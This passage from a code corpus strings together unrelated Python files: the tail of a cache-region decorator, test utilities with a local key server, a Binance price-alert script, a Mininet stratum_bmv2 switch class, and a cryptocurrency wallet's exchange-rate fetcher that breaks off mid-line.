the decorated function is then called with that subset of
arguments.
The returned result is a list::
result = generate_something("key1", "key2", "key3")
The decorator internally makes use of the
:meth:`.CacheRegion.get_or_create_multi` method to access the
cache and conditionally call the function. See that
method for additional behavioral details.
Unlike the :meth:`.CacheRegion.cache_on_arguments` method,
:meth:`.CacheRegion.cache_multi_on_arguments` works only with
a single function signature, one which takes a simple list of
keys as arguments.
Like :meth:`.CacheRegion.cache_on_arguments`, the decorated function
is also provided with a ``set()`` method, which here accepts a
mapping of keys and values to set in the cache::
generate_something.set({"k1": "value1",
"k2": "value2", "k3": "value3"})
...an ``invalidate()`` method, which has the effect of deleting
the given sequence of keys using the same mechanism as that of
:meth:`.CacheRegion.delete_multi`::
generate_something.invalidate("k1", "k2", "k3")
...a ``refresh()`` method, which will call the creation
function, cache the new values, and return them::
values = generate_something.refresh("k1", "k2", "k3")
...and a ``get()`` method, which will return values
based on the given arguments::
values = generate_something.get("k1", "k2", "k3")
.. versionadded:: 0.5.3 Added ``get()`` method to decorated
function.
Parameters passed to :meth:`.CacheRegion.cache_multi_on_arguments`
have the same meaning as those passed to
:meth:`.CacheRegion.cache_on_arguments`.
:param namespace: optional string argument which will be
established as part of each cache key.
:param expiration_time: if not None, will override the normal
expiration time. May be passed as an integer or a
callable.
:param should_cache_fn: passed to
:meth:`.CacheRegion.get_or_create_multi`. This function is given a
value as returned by the creator, and only if it returns True will
that value be placed in the cache.
:param asdict: if ``True``, the decorated function should return
its result as a dictionary of keys->values, and the final result
of calling the decorated function will also be a dictionary.
If left at its default value of ``False``, the decorated function
should return its result as a list of values, and the final
result of calling the decorated function will also be a list.
When ``asdict==True`` if the dictionary returned by the decorated
function is missing keys, those keys will not be cached.
:param to_str: callable, will be called on each function argument
in order to convert to a string. Defaults to ``str()``. If the
function accepts non-ascii unicode arguments on Python 2.x, the
``unicode()`` builtin can be substituted, but note this will
produce unicode cache keys which may require key mangling before
reaching the cache.
.. versionadded:: 0.5.0
:param function_multi_key_generator: a function that will produce a
list of keys. This function will supersede the one configured on the
:class:`.CacheRegion` itself.
.. versionadded:: 0.5.5
.. seealso::
:meth:`.CacheRegion.cache_on_arguments`
:meth:`.CacheRegion.get_or_create_multi`
"""
expiration_time_is_callable = compat.callable(expiration_time)
if function_multi_key_generator is None:
function_multi_key_generator = self.function_multi_key_generator
def decorator(fn):
key_generator = function_multi_key_generator(
namespace, fn,
to_str=to_str)
@wraps(fn)
def decorate(*arg, **kw):
cache_keys = arg
keys = key_generator(*arg, **kw)
key_lookup = dict(zip(keys, cache_keys))
@wraps(fn)
def creator(*keys_to_create):
return fn(*[key_lookup[k] for k in keys_to_create])
timeout = expiration_time() if expiration_time_is_callable \
else expiration_time
if asdict:
def dict_create(*keys):
d_values = creator(*keys)
return [
d_values.get(key_lookup[k], NO_VALUE)
for k in keys]
def wrap_cache_fn(value):
if value is NO_VALUE:
return False
elif not should_cache_fn:
return True
else:
return should_cache_fn(value)
result = self.get_or_create_multi(
keys, dict_create, timeout, wrap_cache_fn)
result = dict(
(k, v) for k, v in zip(cache_keys, result)
if v is not NO_VALUE)
else:
result = self.get_or_create_multi(
keys, creator, timeout,
should_cache_fn)
return result
def invalidate(*arg):
keys = key_generator(*arg)
self.delete_multi(keys)
def set_(mapping):
keys = list(mapping)
gen_keys = key_generator(*keys)
self.set_multi(dict(
(gen_key, mapping[key])
for gen_key, key
in zip(gen_keys, keys))
)
def get(*arg):
keys = key_generator(*arg)
return self.get_multi(keys)
def refresh(*arg):
keys = key_generator(*arg)
values = fn(*arg)
if asdict:
self.set_multi(
dict(zip(keys, [values[a] for a in arg]))
)
return values
else:
self.set_multi(
dict(zip(keys, values))
)
return values
decorate.set = set_
decorate.invalidate = invalidate
decorate.refresh = refresh
decorate.get = get
return decorate
return decorator
def make_region(*arg, **kw):
"""Instantiate a new :class:`.CacheRegion`.
Currently, :func:`.make_region` is a passthrough
to :class:`.CacheRegion`. See that class for
constructor arguments.
"""
return CacheRegion(*arg, **kw)
|
testutil.py
|
# gemato: Test utility functions
# vim:fileencoding=utf-8
# (c) 2017-2020 Michał Górny
# Licensed under the terms of 2-clause BSD license
import errno
import functools
import io
import logging
import os
import os.path
import random
import shutil
import sys
import tempfile
import threading
import unittest
if sys.hexversion >= 0x03000000:
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs
else:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from urlparse import urlparse, parse_qs
import gemato.openpgp
class LoggingTestCase(unittest.TestCase):
def setUp(self):
if sys.hexversion < 0x03000000:
self.log = io.BytesIO()
else:
self.log = io.StringIO()
self.log_handler = logging.getLogger().addHandler(
logging.StreamHandler(self.log))
def tearDown(self):
# TODO: make some use of the log output?
logging.getLogger().removeHandler(self.log_handler)
class TempDirTestCase(LoggingTestCase):
DIRS = []
FILES = {}
def setUp(self):
super(TempDirTestCase, self).setUp()
self.dir = tempfile.mkdtemp()
for k in self.DIRS:
os.mkdir(os.path.join(self.dir, k))
for k, v in self.FILES.items():
with io.open(os.path.join(self.dir, k), 'w', encoding='utf8') as f:
f.write(v)
def tearDown(self):
shutil.rmtree(self.dir)
super(TempDirTestCase, self).tearDown()
class HKPServerRequestHandler(BaseHTTPRequestHandler):
def __init__(self, keys, *args, **kwargs):
self.keys = keys
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def log_message(self, *args, **kwargs):
pass
def do_GET(self):
try:
parsed = urlparse(self.path)
assert parsed.path == '/pks/lookup'
qs = parse_qs(parsed.query)
assert qs.get('op') == ['get']
assert len(qs.get('search', [])) == 1
key = qs['search'][0]
assert key.startswith('0x')
key = key[2:]
except AssertionError:
self.send_error(400, "Bad request")
return
if key not in self.keys:
self.send_error(404, "Not found")
return
self.send_response(200, "OK")
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(self.keys[key])
self.wfile.flush()
class HKPServerTestCase(unittest.TestCase):
"""
A test case deploying HKP server for OpenPGP client to use.
"""
SERVER_KEYS = {}
def setUp(self):
# try 10 randomly selected ports before giving up
for port in random.sample(range(1024, 32768), 10):
try:
self.server = HTTPServer(('127.0.0.1', port),
functools.partial(HKPServerRequestHandler,
self.SERVER_KEYS))
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise unittest.SkipTest('Unable to bind the HKP server: {}'
.format(e))
else:
break
else:
raise unittest.SkipTest('Unable to find a free port for HKP server')
self.server_addr = 'hkp://127.0.0.1:{}'.format(port)
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.start()
def tearDown(self):
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
class MockedWKDOpenPGPEnvironment(gemato.openpgp.OpenPGPEnvironment):
"""
A subclass of OpenPGPEnvironment that partially mocks spawning
OpenPGP in order to inject keys without having to implement
full HTTPS server with domain satisfactory to GnuPG.
"""
def __init__(self, keys={}):
self.keys = keys
super(MockedWKDOpenPGPEnvironment, self).__init__()
def clone(self):
return MockedWKDOpenPGPEnvironment(self.keys)
def _spawn_gpg(self, argv, stdin=''):
if '--locate-keys' in argv:
argv.remove('--locate-keys')
assert len(argv) == 3
assert argv[:2] == ['gpg', '--batch']
if argv[2] in self.keys:
ret, sout, serr = super(MockedWKDOpenPGPEnvironment,
self)._spawn_gpg(
['gpg', '--batch', '--import'],
self.keys[argv[2]])
else:
ret = 2
return (ret, b'', b'')
return super(MockedWKDOpenPGPEnvironment, self)._spawn_gpg(
argv, stdin)
|
main.py
|
from binance.client import Client
from dotenv import load_dotenv
from bin.Token import *
from bin.live_updates import *
from progress.bar import Bar
import os, yaml, json, asyncio, websockets, threading
token_instances = {}
alerts = []
# Load env variables
load_dotenv()
client = Client(os.getenv('API_KEY'), os.getenv('API_SECRET'))
# Initialize server
async def server(websocket, path):
while True:
if alerts:
await websocket.send(json.dumps(alerts.pop()))
# Start websocket server
def start_server():
asyncio.set_event_loop(asyncio.new_event_loop())
start_server = websockets.serve(server, "localhost", 5000)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
# Load yaml config
with open('config.yml', 'r') as ymlfile:
try:
config = yaml.safe_load(ymlfile)
except yaml.YAMLError as err:
print(err)
# Start local websocket server
websocket_server = threading.Thread(target=start_server)
websocket_server.start()
# Start websocket connections ( get live token data )
live_updates_thread = threading.Thread(target=live_updates, args=(config['time_intervals'], config['ema_intervals'], config['watchlist'], 'binance.com', token_instances, alerts))
live_updates_thread.start()
# Download historical token data
for token in config['watchlist']:
print(f"Downloading data for {token}...")
progress_bar = Bar('',
max=(len(config['time_intervals']) * len(config['ema_intervals']) + len(config['time_intervals'])),
fill='█',
suffix='%(percent).1f%% - %(eta)ds')
token_analysis = Token(client, token, config['time_intervals'], config['ema_intervals'], config['precision'], progress_bar)
token_analysis.download_history()
token_analysis.calc_emas()
token_instances.update({token: token_analysis})
print("Done!")
|
stratum.py
|
# coding=utf-8
# Copyright 2018-present Open Networking Foundation
# SPDX-License-Identifier: Apache-2.0
'''
This module contains a switch class for Mininet: StratumBmv2Switch
Prerequisites
-------------
1. Docker- mininet+stratum_bmv2 image:
$ cd stratum
$ docker build -t <some tag> -f tools/mininet/Dockerfile .
Usage
-----
From withing the Docker container, you can run Mininet using the following:
$ mn --custom /root/stratum.py --switch stratum-bmv2 --controller none
Advanced Usage
--------------
You can use this class in a Mininet topology script by including:
from stratum import ONOSStratumBmv2Switch
You will probably need to update your Python path. From within the Docker image:
PYTHONPATH=$PYTHONPATH:/root ./<your script>.py
Notes
-----
This code has been adapted from the ONOSBmv2Switch class defined in the ONOS project
(tools/dev/mininet/bmv2.py).
'''
import json
import multiprocessing
import os
import socket
import threading
import time
from mininet.log import warn
from mininet.node import Switch, Host
DEFAULT_NODE_ID = 1
DEFAULT_CPU_PORT = 255
DEFAULT_PIPECONF = "org.onosproject.pipelines.basic"
STRATUM_BMV2 = 'stratum_bmv2'
STRATUM_INIT_PIPELINE = '/root/dummy.json'
MAX_CONTROLLERS_PER_NODE = 10
BMV2_LOG_LINES = 5
def writeToFile(path, value):
with open(path, "w") as f:
f.write(str(value))
def pickUnusedPort():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
def watchdog(sw):
try:
writeToFile(sw.keepaliveFile,
"Remove this file to terminate %s" % sw.name)
while True:
if StratumBmv2Switch.mininet_exception == 1 \
or not os.path.isfile(sw.keepaliveFile):
sw.stop()
return
if sw.stopped:
return
if sw.bmv2popen.poll() is None:
# All good, no return code, still running.
time.sleep(1)
else:
warn("\n*** WARN: switch %s died ☠️ \n" % sw.name)
sw.printLog()
print("-" * 80) + "\n"
# Close log file, set as stopped etc.
sw.stop()
return
except Exception as e:
warn("*** ERROR: " + e.message)
sw.stop()
class StratumBmv2Switch(Switch):
# Shared value used to notify to all instances of this class that a Mininet
# exception occurred. Mininet exception handling doesn't call the stop()
# method, so the mn process would hang after clean-up since Bmv2 would still
# be running.
mininet_exception = multiprocessing.Value('i', 0)
nextGrpcPort = 50001
def __init__(self, name, json=STRATUM_INIT_PIPELINE, loglevel="warn",
cpuport=DEFAULT_CPU_PORT, pipeconf=DEFAULT_PIPECONF,
onosdevid=None,
**kwargs):
Switch.__init__(self, name, **kwargs)
self.grpcPort = StratumBmv2Switch.nextGrpcPort
StratumBmv2Switch.nextGrpcPort += 1
self.cpuPort = cpuport
self.json = json
self.loglevel = loglevel
self.tmpDir = '/tmp/%s' % self.name
self.logfile = '%s/stratum_bmv2.log' % self.tmpDir
self.netcfgFile = '%s/onos-netcfg.json' % self.tmpDir
self.chassisConfigFile = '%s/chassis-config.txt' % self.tmpDir
self.pipeconfId = pipeconf
self.longitude = kwargs['longitude'] if 'longitude' in kwargs else None
self.latitude = kwargs['latitude'] if 'latitude' in kwargs else None
if onosdevid is not None and len(onosdevid) > 0:
self.onosDeviceId = onosdevid
else:
# The "device:" prefix is required by ONOS.
self.onosDeviceId = "device:%s" % self.name
self.nodeId = DEFAULT_NODE_ID
self.logfd = None
self.bmv2popen = None
self.stopped = True
# In case of exceptions, mininet removes *.out files from /tmp. We use
# this as a signal to terminate the switch instance (if active).
self.keepaliveFile = '/tmp/%s-watchdog.out' % self.name
# Remove files from previous executions
self.cleanupTmpFiles()
os.mkdir(self.tmpDir)
def getOnosNetcfg(self):
basicCfg = {
"managementAddress": "grpc://localhost:%d?device_id=%d" % (
self.grpcPort, self.nodeId),
"driver": "stratum-bmv2",
"pipeconf": self.pipeconfId
}
if self.longitude and self.latitude:
basicCfg["longitude"] = self.longitude
basicCfg["latitude"] = self.latitude
netcfg = {
"devices": {
self.onosDeviceId: {
"basic": basicCfg
}
}
}
return netcfg
def getChassisConfig(self):
config = """description: "stratum_bmv2 {name}"
chassis {{
platform: PLT_P4_SOFT_SWITCH
name: "{name}"
}}
nodes {{
id: {nodeId}
name: "{name} node {nodeId}"
slot: 1
index: 1
}}\n""".format(name=self.name, nodeId=self.nodeId)
intf_number = 1
for intf_name in self.intfNames():
if intf_name == 'lo':
continue
config = config + """singleton_ports {{
id: {intfNumber}
name: "{intfName}"
slot: 1
port: {intfNumber}
channel: 1
speed_bps: 10000000000
config_params {{
admin_state: ADMIN_STATE_ENABLED
}}
node: {nodeId}
}}\n""".format(intfName=intf_name, intfNumber=intf_number, nodeId=self.nodeId)
intf_number += 1
return config
def start(self, controllers):
if not self.stopped:
warn("*** %s is already running!\n" % self.name)
return
writeToFile("%s/grpc-port.txt" % self.tmpDir, self.grpcPort)
with open(self.chassisConfigFile, 'w') as fp:
fp.write(self.getChassisConfig())
with open(self.netcfgFile, 'w') as fp:
json.dump(self.getOnosNetcfg(), fp, indent=2)
args = [
STRATUM_BMV2,
'-device_id=%d' % self.nodeId,
'-chassis_config_file=%s' % self.chassisConfigFile,
'-forwarding_pipeline_configs_file=%s/pipe.txt' % self.tmpDir,
'-persistent_config_dir=%s' % self.tmpDir,
'-initial_pipeline=%s' % STRATUM_INIT_PIPELINE,
'-cpu_port=%s' % self.cpuPort,
'-external_stratum_urls=0.0.0.0:%d' % self.grpcPort,
'-local_stratum_url=localhost:%d' % pickUnusedPort(),
'-max_num_controllers_per_node=%d' % MAX_CONTROLLERS_PER_NODE,
'-write_req_log_file=%s/write-reqs.txt' % self.tmpDir,
'-logtosyslog=false',
'-logtostderr=true',
'-bmv2_log_level=%s' % self.loglevel,
]
cmd_string = " ".join(args)
try:
# Write cmd_string to log for debugging.
self.logfd = open(self.logfile, "w")
self.logfd.write(cmd_string + "\n\n" + "-" * 80 + "\n\n")
self.logfd.flush()
self.bmv2popen = self.popen(cmd_string, stdout=self.logfd, stderr=self.logfd)
print "⚡️ %s @ %d" % (STRATUM_BMV2, self.grpcPort)
# We want to be notified if stratum_bmv2 quits prematurely...
self.stopped = False
threading.Thread(target=watchdog, args=[self]).start()
except Exception:
StratumBmv2Switch.mininet_exception = 1
self.stop()
self.printLog()
raise
def printLog(self):
if os.path.isfile(self.logfile):
print "-" * 80
print "%s log (from %s):" % (self.name, self.logfile)
with open(self.logfile, 'r') as f:
lines = f.readlines()
if len(lines) > BMV2_LOG_LINES:
print "..."
for line in lines[-BMV2_LOG_LINES:]:
print line.rstrip()
def cleanupTmpFiles(self):
self.cmd("rm -rf %s" % self.tmpDir)
def stop(self, deleteIntfs=True):
"""Terminate switch."""
self.stopped = True
if self.bmv2popen is not None:
if self.bmv2popen.poll() is None:
self.bmv2popen.terminate()
self.bmv2popen.wait()
self.bmv2popen = None
if self.logfd is not None:
self.logfd.close()
self.logfd = None
Switch.stop(self, deleteIntfs)
class NoOffloadHost(Host):
def __init__(self, name, inNamespace=True, **params):
Host.__init__(self, name, inNamespace=inNamespace, **params)
def config(self, **params):
r = super(Host, self).config(**params)
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload %s %s off" \
% (self.defaultIntf(), off)
self.cmd(cmd)
return r
# Exports for bin/mn
switches = {'stratum-bmv2': StratumBmv2Switch}
hosts = {'no-offload-host': NoOffloadHost}
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .zcore import COIN
from .i18n import _
from .util import PrintError, ThreadJob, make_dir
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitbank(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('public.bitbank.cc', '/btc_jpy/ticker')
return {'JPY': Decimal(json['data']['last'])}
class BitFlyer(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitflyer.jp', '/api/echo/price')
return {'JPY': Decimal(json['mid'])}
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('btc_to_')])
class CoinDesk(ExchangeBase):
def get_currencies(self):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
return [d['currency'] for d in dicts]
def get_rates(self, ccy):
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
result = {ccy: Decimal(json['bpi'][ccy]['rate_float'])}
return result
def history_starts(self):
return { 'USD': '2012-11-30', 'EUR': '2013-09-01' }
def history_ccys(self):
return self.history_starts().keys()
def request_history(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
pairs = ['XBT%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
class TheRockTrading(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.therocktrading.com',
'/v1/funds/BTCEUR/ticker')
return {'EUR': Decimal(json['last'])}
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', 'trade?buy')
return {'INR': Decimal(json)}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
class Zaif(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.zaif.jp', '/api/1/last_price/btc_jpy')
return {'JPY': Decimal(json['last_price'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
make_dir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
